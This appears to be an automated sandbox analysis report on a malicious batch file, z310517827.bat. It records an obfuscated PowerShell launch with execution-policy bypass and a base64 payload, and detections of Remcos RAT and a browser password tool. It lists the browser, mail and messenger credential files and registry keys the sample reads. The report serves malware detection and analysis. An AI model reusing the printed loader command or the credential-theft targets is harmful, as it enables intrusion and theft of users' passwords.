Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('dqoncirzy3jpchrdb250zw50id0gqccncir1c2vya2xyz3joyw1ligtscmdypsakzw5rbhjncny6vvnfa2xyz3jstkfnrwtscmdyoyrqbwrrbhjncm9tid0ga2xyz3iiqzpcvwtscmdyc2vyc1xrbhjncir1c2vya2xyz3joyw1lxgtscmdyzhdtlmjrbhjncmf0ijtpa2xyz3jmichuzwtscmdyc3qtugfrbhjncnroicrqa2xyz3jtzg9tkwtscmdyihsgicbrbhjncibxcml0a2xyz3jlluhvc2tscmdydcaiqmfrbhjncnrjacbma2xyz3jpbgugzmtscmdyb3vuzdprbhjnciakam1ka2xyz3jvbsiglwtscmdyrm9yzwdrbhjncnjvdw5ka2xyz3jdb2xvcmtscmdyien5yw5rbhjncjsgicaga2xyz3ikzmlszwtscmdytgluzxnrbhjncia9iftta2xyz3j5c3rlbwtscmdylklplkzrbhjncmlszv06a2xyz3i6umvhzgtscmdyqwxstglrbhjncm5lcygka2xyz3jqbwrvbwtscmdylcbbu3lrbhjncnn0zw0ua2xyz3juzxh0lmtscmdyrw5jb2rrbhjncmluz106a2xyz3i6vvrgogtscmdyktsgicbrbhjncibmb3jla2xyz3jhy2ggkgtscmdyjgxpbmvrbhjncibpbiaka2xyz3jmawxltgtscmdyaw5lcylrbhjncib7icaga2xyz3igicagigtscmdyawygkcrrbhjncmxpbmuga2xyz3itbwf0y2tscmdyacanxjprbhjncjo6id8oa2xyz3iukykkj2tscmdyksb7icbrbhjnciagicaga2xyz3igicagigtscmdyv3jpdgvrbhjnci1ib3n0a2xyz3igikluamtscmdyzwn0aw9rbhjncm4gy29ka2xyz3jligrldgtscmdyzwn0zwrrbhjncibpbib0a2xyz3jozsbiywtscmdydgnoigzrbhjncmlszs4ia2xyz3igluzvcmtscmdyzwdyb3vrbhjncm5kq29sa2xyz3jvcibdewtscmdyyw47icbrbhjnciagicaga2xyz3igicagigtscmdydhj5ihtrbhjnciagicaga2xyz3igicagigtscmdyicagicbrbhjnciakzgvja2xyz3jvzgvkqmtscmdyexrlcybrbhjncj0gw1n5a2xyz3jzdgvtlmtscmdyq29udmvrbhjncnj0xto6a2xyz3jgcm9tqmtscmdyyxnlnjrrbhjncln0cmlua2xyz3jnkcrtywtscmdydgnozxnrbhjnclsxxs5ua2xyz3jyaw0okwtscmdyktsgicbrbhjnciagicaga2xyz3igicagigtscmdyicagjglrbhjncm5qzwn0a2xyz3jpb25db2tscmdyzgugpsbrbhjnclttexn0a2xyz3jlbs5uzwtscmdyehqurw5rbhjncmnvzglua2xyz3jnxto6vwtscmdybmljb2rrbhjncmuur2v0a2xyz3jtdhjpbmtscmdyzygkzgvrbhjncmnvzgvka2xyz3jcexrlc2tscmdyktsgicbrbhjnciagicaga2xyz3igicagigtscmdyicagv3jrbhjncml0zs1ia2xyz3jvc3qgimtscmdysw5qzwnrbhjncnrpb24ga2xyz3jjb2rligtscmdyzgvjb2rrbhjncmvkihn1a2xyz3jjy2vzc2tscmdyznvsbhlrbhjnci4iic1ga2xyz3jvcmvncmtscmdyb3vuzenrbhjncm9sb3iga2xyz3jhcmvlbmtscmdyoyagicbrbhjnciagicaga2xyz3igicagigtscmdyicbxcmlrbhjncnrlluhva2xyz3jzdcairwtscmdyegvjdxrrbhjncmluzybpa2xyz3juamvjdgtscmdyaw9uignrbhjncm9kzs4ua2xyz3iuiiatrmtscmdyb3jlz3jrbhjncm91bmrda2xyz3jvbg9yigtscmdywwvsbg9rbhjncnc7icaga2xyz3igicagigtscmdyicagicbrbhjnciagielua2xyz3j2b2tllwtscmdyrxhwcmvrbhjncnnzaw9ua2xyz3igjgluamtscmdyzwn0aw9rbhjncm5db2rla2xyz3i7icagigtscmdyicagicbrbhjnciagicaga2xyz3igigjyzwtscmdyyws7icbrbhjnciagicaga2xyz3igicagigtscmdyfsbjyxrrbhjncmnoihsga2xyz3igicagigtscmdyicagicbrbhjnciagicaga2xyz3jxcml0zwtscmdyluhvc3rrbhjnciairxjya2xyz3jvcibkdwtscmdycmluzybrbhjncmrly29ka2xyz3jpbmcgb2tscmdyciblegvrbhjncmn1dglua2xyz3jnigluamtscmdyzwn0aw9rbhjncm4gy29ka2xyz3jloiakx2tscmdyiiatrm9rbhjncnjlz3jva2xyz3j1bmrdb2tscmdybg9yifjrbhjncmvkoyaga2xyz3igicagigtscmdyicagicbrbhjncn07icaga2xyz3igicagigtscmdyftsgicbrbhjncib9o30ga2xyz3jlbhnligtscmdyeyagicbrbhjnciagv3jpa2xyz3j0zs1ib2tscmdyc3qgilnrbhjncnlzdgvta2xyz3igrxjyb2tscmdycjogqm
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('dqoncirzy3jpchrdb250zw50id0gqccncir1c2vya2xyz3joyw1ligtscmdypsakzw5rbhjncny6vvnfa2xyz3jstkfnrwtscmdyoyrqbwrrbhjncm9tid0ga2xyz3iiqzpcvwtscmdyc2vyc1xrbhjncir1c2vya2xyz3joyw1lxgtscmdyzhdtlmjrbhjncmf0ijtpa2xyz3jmichuzwtscmdyc3qtugfrbhjncnroicrqa2xyz3jtzg9tkwtscmdyihsgicbrbhjncibxcml0a2xyz3jlluhvc2tscmdydcaiqmfrbhjncnrjacbma2xyz3jpbgugzmtscmdyb3vuzdprbhjnciakam1ka2xyz3jvbsiglwtscmdyrm9yzwdrbhjncnjvdw5ka2xyz3jdb2xvcmtscmdyien5yw5rbhjncjsgicaga2xyz3ikzmlszwtscmdytgluzxnrbhjncia9iftta2xyz3j5c3rlbwtscmdylklplkzrbhjncmlszv06a2xyz3i6umvhzgtscmdyqwxstglrbhjncm5lcygka2xyz3jqbwrvbwtscmdylcbbu3lrbhjncnn0zw0ua2xyz3juzxh0lmtscmdyrw5jb2rrbhjncmluz106a2xyz3i6vvrgogtscmdyktsgicbrbhjncibmb3jla2xyz3jhy2ggkgtscmdyjgxpbmvrbhjncibpbiaka2xyz3jmawxltgtscmdyaw5lcylrbhjncib7icaga2xyz3igicagigtscmdyawygkcrrbhjncmxpbmuga2xyz3itbwf0y2tscmdyacanxjprbhjncjo6id8oa2xyz3iukykkj2tscmdyksb7icbrbhjnciagicaga2xyz3igicagigtscmdyv3jpdgvrbhjnci1ib3n0a2xyz3igikluamtscmdyzwn0aw9rbhjncm4gy29ka2xyz3jligrldgtscmdyzwn0zwrrbhjncibpbib0a2xyz3jozsbiywtscmdydgnoigzrbhjncmlszs4ia2xyz3igluzvcmtscmdyzwdyb3vrbhjncm5kq29sa2xyz3jvcibdewtscmdyyw47icbrbhjnciagicaga2xyz3igicagigtscmdydhj5ihtrbhjnciagicaga2xyz3igicagigtscmdyicagicbrbhjnciakzgvja2xyz3jvzgvkqmtscmdyexrlcybrbhjncj0gw1n5a2xyz3jzdgvtlmtscmdyq29udmvrbhjncnj0xto6a2xyz3jgcm9tqmtscmdyyxnlnjrrbhjncln0cmlua2xyz3jnkcrtywtscmdydgnozxnrbhjnclsxxs5ua2xyz3jyaw0okwtscmdyktsgicbrbhjnciagicaga2xyz3igicagigtscmdyicagjglrbhjncm5qzwn0a2xyz3jpb25db2tscmdyzgugpsbrbhjnclttexn0a2xyz3jlbs5uzwtscmdyehqurw5rbhjncmnvzglua2xyz3jnxto6vwtscmdybmljb2rrbhjncmuur2v0a2xyz3jtdhjpbmtscmdyzygkzgvrbhjncmnvzgvka2xyz3jcexrlc2tscmdyktsgicbrbhjnciagicaga2xyz3igicagigtscmdyicagv3jrbhjncml0zs1ia2xyz3jvc3qgimtscmdysw5qzwnrbhjncnrpb24ga2xyz3jjb2rligtscmdyzgvjb2rrbhjncmvkihn1a2xyz3jjy2vzc2tscmdyznvsbhlrbhjnci4iic1ga2xyz3jvcmvncmtscmdyb3vuzenrbhjncm9sb3iga2xyz3jhcmvlbmtscmdyoyagicbrbhjnciagicaga2xyz3igicagigtscmdyicbxcmlrbhjncnrlluhva2xyz3jzdcairwtscmdyegvjdxrrbhjncmluzybpa2xyz3juamvjdgtscmdyaw9uignrbhjncm9kzs4ua2xyz3iuiiatrmtscmdyb3jlz3jrbhjncm91bmrda2xyz3jvbg9yigtscmdywwvsbg9rbhjncnc7icaga2xyz3igicagigtscmdyicagicbrbhjnciagielua2xyz3j2b2tllwtscmdyrxhwcmvrbhjncnnzaw9ua2xyz3igjgluamtscmdyzwn0aw9rbhjncm5db2rla2xyz3i7icagigtscmdyicagicbrbhjnciagicaga2xyz3igigjyzwtscmdyyws7icbrbhjnciagicaga2xyz3igicagigtscmdyfsbjyxrrbhjncmnoihsga2xyz3igicagigtscmdyicagicbrbhjnciagicaga2xyz3jxcml0zwtscmdyluhvc3rrbhjnciairxjya2xyz3jvcibkdwtscmdycmluzybrbhjncmrly29ka2xyz3jpbmcgb2tscmdyciblegvrbhjncmn1dglua2xyz3jnigluamtscmdyzwn0aw9rbhjncm4gy29ka2xyz3jloiakx2tscmdyiiatrm9rbhjncnjlz3jva2xyz3j1bmrdb2tscmdybg9yifjrbhjncmvkoyaga2xyz3igicagigtscmdyicagicbrbhjncn07icaga2xyz3igicagigtscmdyftsgicbrbhjncib9o30ga2xyz3jlbhnligtscmdyeyagicbrbhjnciagv3jpa2xyz3j0zs1ib2tscmdyc3qgilnrbhjncnlzdgvta2xyz3igrxjyb2tscmdycjogqm			Jump to behavior

Source: powershell.exe, 00000005.00000002.3680732491.0000000008454000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerN
Source: powershell.exe, 00000005.00000002.3680600008.0000000008407000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerH
Source: powershell.exe, 00000005.00000002.3677060324.0000000007571000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerh
Source: powershell.exe, 00000005.00000002.3680732491.0000000008454000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManageryNY
Source: powershell.exe, 00000005.00000002.3677060324.0000000007571000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerf
Source: powershell.exe, 00000005.00000002.3680600008.0000000008407000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3677060324.0000000007571000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3664111181.0000000003223000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: powershell.exe, 00000005.00000002.3680600008.0000000008407000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManageruTWVtb2A
Source: powershell.exe, 00000005.00000002.3677060324.0000000007571000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managera
Source: powershell.exe, 00000005.00000002.3677060324.0000000007571000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerB
Source: powershell.exe, 00000005.00000002.3677060324.0000000007571000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager0
Source: powershell.exe, 00000005.00000002.3677060324.0000000007571000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerM
Source: powershell.exe, 00000005.00000002.3677060324.0000000007571000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager1310004
Source: powershell.exe, 00000005.00000002.3664111181.000000000327B000.00000004.00000020.00020000.00000000.sdmp, kalmzots.dat.5.dr	Binary or memory string: [2025/03/16 21:04:39 Program Manager]
Source: powershell.exe, 00000005.00000002.3680732491.0000000008454000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerGN;
Source: powershell.exe, 00000005.00000002.3680600008.0000000008407000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3677060324.0000000007571000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerr\|
Source: powershell.exe, 00000005.00000002.3677060324.0000000007571000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managered4da35
Source: powershell.exe, 00000005.00000002.3677060324.0000000007571000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: powershell.exe, 00000005.00000002.3677060324.0000000007571000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managert
Source: powershell.exe, 00000005.00000002.3680732491.0000000008454000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerZN>
Source: powershell.exe, 00000005.00000002.3677060324.0000000007571000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager247adc3
Source: powershell.exe, 00000005.00000002.3680600008.0000000008407000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3664111181.000000000326B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \|Program Manager\|
Source: powershell.exe, 00000005.00000002.3677060324.0000000007571000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager[

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 5_2_10002933 cpuid

5_2_10002933

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 5_2_10002264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

5_2_10002264

Source: C:\Windows\SysWOW64\recover.exe

Code function: 13_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,

13_2_004082CD

Source: C:\Windows\SysWOW64\recover.exe

Code function: 12_2_004192F2 GetVersionExW,

12_2_004192F2

Source: C:\Windows\SysWOW64\recover.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Batch Injector

Source: Yara match	File source: amsi32_7976.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7976, type: MEMORYSTR

Yara detected Remcos RAT

Source: Yara match	File source: 5.2.powershell.exe.8a51288.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.powershell.exe.8a51288.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3682683919.0000000008B29000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3682024098.0000000008A50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7976, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\kalmzots.dat, type: DROPPED

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\recover.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Instant Messenger accounts or passwords

Source: C:\Windows\SysWOW64\recover.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Key opened: HKEY_CURRENT_USER\Software\Paltalk	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\recover.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail	Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Windows\SysWOW64\recover.exe	Code function: ESMTPPassword	13_2_004033F0
Source: C:\Windows\SysWOW64\recover.exe	Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword	13_2_00402DB3
Source: C:\Windows\SysWOW64\recover.exe	Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword	13_2_00402DB3

Yara detected WebBrowserPassView password recovery tool

Source: Yara match	File source: 5.2.powershell.exe.b820000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.recover.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.powershell.exe.b820000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.recover.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3694477721.000000000B820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1571994329.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7976, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: recover.exe PID: 7544, type: MEMORYSTR

Remote Access Functionality

Yara detected Batch Injector

Source: Yara match	File source: amsi32_7976.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7976, type: MEMORYSTR

Yara detected Remcos RAT

Source: Yara match	File source: 5.2.powershell.exe.8a51288.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.powershell.exe.8a51288.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3682683919.0000000008B29000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3682024098.0000000008A50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7976, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\kalmzots.dat, type: DROPPED

Windows Analysis Report
z310517827.bat

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Cryptography

Exploits

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Windows Analysis Report z310517827.bat

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Cryptography

Exploits

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Windows Analysis Report
z310517827.bat

Malware Threat Intel
Provided by